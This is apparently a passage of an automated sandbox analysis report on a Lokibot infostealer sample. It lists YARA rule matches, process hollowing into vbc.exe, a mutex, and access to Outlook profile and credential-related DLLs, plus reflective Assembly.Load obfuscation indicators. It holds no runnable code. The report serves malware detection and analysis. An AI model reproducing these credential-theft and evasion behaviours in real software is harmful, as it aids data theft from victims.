                  Source: 00000000.00000002.2118840141.00000000044E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000000.00000002.2118642185.0000000003300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 00000000.00000002.2118642185.0000000003300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 00000000.00000002.2118642185.0000000003300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: Process Memory Space: Hh8hqqbu9X.exe PID: 7064, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: Process Memory Space: vbc.exe PID: 3292, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: Hh8hqqbu9X.exe, iNVPufDPn5uIum70m3.csLong String: Length: 197977
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeCode function: 0_2_05906E58 NtUnmapViewOfSection,0_2_05906E58
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeCode function: 0_2_05906E50 NtUnmapViewOfSection,0_2_05906E50
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeCode function: 0_2_0182D3240_2_0182D324
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeCode function: 0_2_058A1C510_2_058A1C51
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeCode function: 0_2_058ABE440_2_058ABE44
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeCode function: 0_2_058A00060_2_058A0006
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeCode function: 0_2_058A00400_2_058A0040
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeCode function: 0_2_058ACC390_2_058ACC39
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeCode function: 0_2_059081280_2_05908128
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeCode function: 0_2_059020200_2_05902020
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 1_2_0040549C1_2_0040549C
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 1_2_004029D41_2_004029D4
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 0041219C appears 45 times
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00405B6F appears 42 times
                  Source: Hh8hqqbu9X.exe, 00000000.00000002.2120039598.0000000005D5B000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewIY4QyF28CHou9U8a.exe4 vs Hh8hqqbu9X.exe
                  Source: Hh8hqqbu9X.exe, 00000000.00000002.2118072491.0000000001723000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs Hh8hqqbu9X.exe
                  Source: Hh8hqqbu9X.exe, 00000000.00000002.2118642185.0000000003300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameadderalldll.dll8 vs Hh8hqqbu9X.exe
                  Source: Hh8hqqbu9X.exe, 00000000.00000002.2118840141.00000000044E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewIY4QyF28CHou9U8a.exe4 vs Hh8hqqbu9X.exe
                  Source: Hh8hqqbu9X.exe, 00000000.00000002.2118028228.000000000167E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Hh8hqqbu9X.exe
                  Source: Hh8hqqbu9X.exe, 00000000.00000002.2120089824.0000000005D70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameadderalldll.dll8 vs Hh8hqqbu9X.exe
                  Source: Hh8hqqbu9X.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: 1.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 1.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 1.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 1.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 1.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 0.2.Hh8hqqbu9X.exe.4520930.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 0.2.Hh8hqqbu9X.exe.4520930.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 0.2.Hh8hqqbu9X.exe.4520930.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.Hh8hqqbu9X.exe.4520930.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 1.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 1.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 1.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 1.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 1.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 0.2.Hh8hqqbu9X.exe.4520930.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 0.2.Hh8hqqbu9X.exe.4520930.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 0.2.Hh8hqqbu9X.exe.4520930.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.Hh8hqqbu9X.exe.4520930.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.Hh8hqqbu9X.exe.4520930.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 0.2.Hh8hqqbu9X.exe.44fc0f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 0.2.Hh8hqqbu9X.exe.44fc0f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 0.2.Hh8hqqbu9X.exe.44fc0f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.Hh8hqqbu9X.exe.44fc0f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.Hh8hqqbu9X.exe.44fc0f0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 0.2.Hh8hqqbu9X.exe.330680c.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 0.2.Hh8hqqbu9X.exe.330680c.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 0.2.Hh8hqqbu9X.exe.330680c.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.Hh8hqqbu9X.exe.330680c.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.Hh8hqqbu9X.exe.330680c.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 00000000.00000002.2118840141.00000000044E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 00000000.00000002.2118840141.00000000044E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 00000000.00000002.2118840141.00000000044E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000000.00000002.2118642185.0000000003300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 00000000.00000002.2118642185.0000000003300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 00000000.00000002.2118642185.0000000003300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: Process Memory Space: Hh8hqqbu9X.exe PID: 7064, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: Process Memory Space: vbc.exe PID: 3292, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 0.2.Hh8hqqbu9X.exe.330680c.0.raw.unpack, 9mxqGQC9.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.Hh8hqqbu9X.exe.44fc0f0.1.raw.unpack, gl9pyzyi.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.Hh8hqqbu9X.exe.5d70000.4.raw.unpack, 9mxqGQC9.csCryptographic APIs: 'CreateDecryptor'
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@5/2
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,1_2_0040650A
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 1_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,1_2_0040434D
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Hh8hqqbu9X.exe.logJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeMutant created: \Sessions\1\BaseNamedObjects\NULL
                  Source: Hh8hqqbu9X.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Hh8hqqbu9X.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Hh8hqqbu9X.exeReversingLabs: Detection: 81%
                  Source: Hh8hqqbu9X.exeVirustotal: Detection: 78%
                  Source: unknownProcess created: C:\Users\user\Desktop\Hh8hqqbu9X.exe "C:\Users\user\Desktop\Hh8hqqbu9X.exe"
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                  Source: Hh8hqqbu9X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Hh8hqqbu9X.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Hh8hqqbu9X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: vQEIiVK6q7yMZDUH.pdb source: Hh8hqqbu9X.exe
                  Source: Binary string: vQEIiVK6q7yMZDUH.pdbxf source: Hh8hqqbu9X.exe

                  Data Obfuscation

                  barindex
                  Source: Hh8hqqbu9X.exe, GyyIAXZvopEDFokB3I.cs.Net Code: OlRZpA8Cg
                  Source: 0.2.Hh8hqqbu9X.exe.330680c.0.raw.unpack, 7rdeodzy.cs.Net Code: run System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Hh8hqqbu9X.exe.330680c.0.raw.unpack, 7rdeodzy.cs.Net Code: run System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Hh8hqqbu9X.exe.330680c.0.raw.unpack, 7rdeodzy.cs.Net Code: run System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Hh8hqqbu9X.exe.330680c.0.raw.unpack, 9mxqGQC9.cs.Net Code: yuX3dnbw System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Hh8hqqbu9X.exe.330680c.0.raw.unpack, DeEP5Q00.cs.Net Code: hQyn916S System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Hh8hqqbu9X.exe.330680c.0.raw.unpack, DeEP5Q00.cs.Net Code: hQyn916S System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Hh8hqqbu9X.exe.44fc0f0.1.raw.unpack, gl9pyzyi.cs.Net Code: gr4483N9 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Hh8hqqbu9X.exe.44fc0f0.1.raw.unpack, CS3TtnZp.cs.Net Code: _4lRGy0vo System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Hh8hqqbu9X.exe.44fc0f0.1.raw.unpack, CS3TtnZp.cs.Net Code: _4lRGy0vo
